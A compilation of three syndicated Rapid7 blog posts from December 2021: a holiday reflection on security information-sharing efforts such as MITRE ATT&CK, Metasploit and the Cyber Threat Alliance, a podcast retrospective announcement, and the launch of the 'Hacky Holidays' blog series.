Rewind to the early years of the internet: A 15-year-old hacked the source code for NASA’s International Space Station; Russians extracted $10 million from Citibank; the Department of Justice and Los Alamos National Laboratory (site of the Manhattan Project and home to classified nuclear and weapons secrets) were breached.

What happened next? Organized beneficence

In 1999, MITRE researchers released the first searchable public record of 321 common vulnerabilities. In less than 3 years, there were 2,000+ vulnerabilities shared. By 2013, the effort resulted in the MITRE ATT&CK Framework that documented attacker tactics and techniques based on real-world observations of advanced persistent threat actors. With this framework, the security community has a common language and library to understand attackers — and what we can do to stop them.

MITRE ATT&CK is open and available to anyone for use at no charge. Of course, detailed ATT&CK mapping is part of InsightIDR’s vast library of critical attacker behaviors and endpoint detections.

Not long after MITRE published its first vulnerabilities, military systems at the Pentagon and NASA were breached by a guy looking for evidence of UFOs. The fun never ends. That same year, security expert and open source guru H.D. Moore released the first edition of his Metasploit Project with 11 exploits. Metasploit 2.0 followed quickly. With the 3.0 release, users began to contribute, and a community was born.

Today, Rapid7’s Metasploit is a voluntary collaboration between 300,000+ users and contributors around the world, including Rapid7 security engineers. It includes more than 1677 exploits organized over 25 platforms, and nearly 500 payloads. And it’s a favorite of pen testers and red teamers worldwide.

The Cyber Threat Alliance took everything up a notch

A nonprofit working to improve the security of our global digital ecosystem by enabling near real-time, high-quality threat information sharing, the Cyber Threat Alliance (CTA) has staff and a technology platform for sharing advanced threat data. CTA members — often competitors — work together in good faith to distribute timely, actionable, contextualized, and campaign-based intelligence.

Rapid7 is among the members who, on average, share 5 million observable events per month. And the result: We all get ever-better at thwarting adversaries and improving our collective security.

In 2017, the holiday spirit became a quarterly thing for us

That’s the year Rapid7 released our first threat intelligence report. Today, our quarterly Threat Reports share clear, distilled learnings and practical guidance from the wealth of data we continuously gather. Our sources include:

  • Metasploit, now the world’s most used pen testing framework
  • Rapid7’s Insight platform, covering vulnerability management, application security, detection and response, external threat intelligence, orchestration and automation, and more
  • Rapid7’s Project Sonar, which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities typically unknown to IT teams
  • Project Heisenberg, a globally distributed, low-interaction honeypot network that monitors for malicious inbound connections, and a forum for collaboration and confirmation relationships with other internet-scale researchers
  • Our global network of Managed Detection and Response (MDR) SOCs that use and vet Rapid7 products, do proactive threat hunting along with daily triage and remote incident response, and provide raw intelligence around emergent threats

The Internet connects everyone and everything with no centralized control. We put it together that way, and there’s clearly no grand plan to make it secure. So we step up. Every time the malware operation Emotet resurfaces, a group of security researchers and system administrators reunites to fight it. (The only name we really know is what they call themselves: “Cryptolaemus.” That’s a mealy bug that goes after unhealthy plants.)

My father-in-law sent a $300 gift card to a hacker. We’re easy marks, ruled by emotions that haven’t changed much since we were cave-dwelling Paleolithic hominins.

But we’re also us. You.

Whatever winter holiday you celebrated, here’s hoping it was a good one. And that you raised a glass to all the good folks, the good fight. Don’t stop believing.




Hacky Holidays: Celebrating the Best of Security Nation [Video]

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/


Most of us allow ourselves a few extra indulgences around the holidays — so despite my best editorial sensibilities, I’m letting myself indulge here in a well-deserved and sincerely meant cliche: For those of us who work on the Security Nation podcast, it really is a gift that keeps on giving.

Getting to hear our research and policy champions Jen Ellis and Tod Beardsley chat with some of the most thoughtful and influential people in cybersecurity on a biweekly basis is a welcome reminder of how vibrant and forward-thinking the security community is — especially during a time when virtual meetings and at-home workweeks are still the norm for most of us, and our work lives still feel more isolated than they once did.

To wrap up this year of podcasting, Security Nation’s Producer Jennifer Carson (who’s also a Senior Solutions Engineer here at Rapid7) and I thought it would be fun to convince Jen and Tod to let us turn the tables and interview them for a change. Sure, it was a somewhat transparent attempt to win ourselves a few moments in the spotlight, but it also gave us a chance to get together and reminisce about the year’s podcasting exploits. We covered:

  • How Jen and Tod got started in the podcasting game
  • The biggest security stories we covered this year
  • Jen and Tod’s most memorable podcast moments from 2021
  • The episode that made our normally fearless hosts tear up
  • Why PCI DSS compliance is more exciting than you might think
  • Who our dream guests are for 2022
  • And much more!

Check out the full conversation, see all of our shining faces, and get excited for what’s to come in 2022.


Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/


The holiday season often inspires reflection on the year coming to a close — but with the new year approaching, this season can also signal the opportunity for a fresh start.

In that spirit, we’re announcing a refreshed theme and approach to our annual holiday blog series: Hacky Holidays!

While we’ll always treasure the years of HaXmas, we wanted to do something more inclusive this year, so infosec practitioners from all walks of life can take part, regardless of what year-end observances you might keep. The change also gives us an opportunity to expand our publishing dates outside the traditional 12 Days of Christmas, so we can supply you with festively themed security content all season long — we’ll be running Hacky Holidays here on the Rapid7 blog throughout the whole month of December.

Our greatest holiday hits

Before we tell you more about the exciting content we have planned for the inaugural edition of Hacky Holidays, let’s pay a little homage to HaXmas and take a look at some of our holiday highlights from years past.

  • We gave you some tips for how to fill the role of sysadmin for your non-security-minded family (without going totally crazy).
  • We told the tale of Kevin the Elf, admin for Santa’s master list, who receives a suspicious email claiming to come from the Claus himself.


What’s waiting under the tree this year

Now that we’ve got you in the spirit of cybersecurity cheer, here’s a look ahead at what we have planned for the inaugural Hacky Holidays.

  • Our team’s predictions for what 2022 might hold for security pros
  • A look back at the latest season of Security Nation — where some behind-the-mic personalities turn the tables to interview Jen and Tod
  • A deep dive into some of the inspiring ways security pros are giving back to the community
  • A brief tutorial on membership inference for neural networks from our resident AI expert, Erick Galinkin
  • A wrap-up of all things Metasploit from 2021
  • And much more!

Check back with us throughout the month so you don’t miss out on the Hacky Holiday cheer!

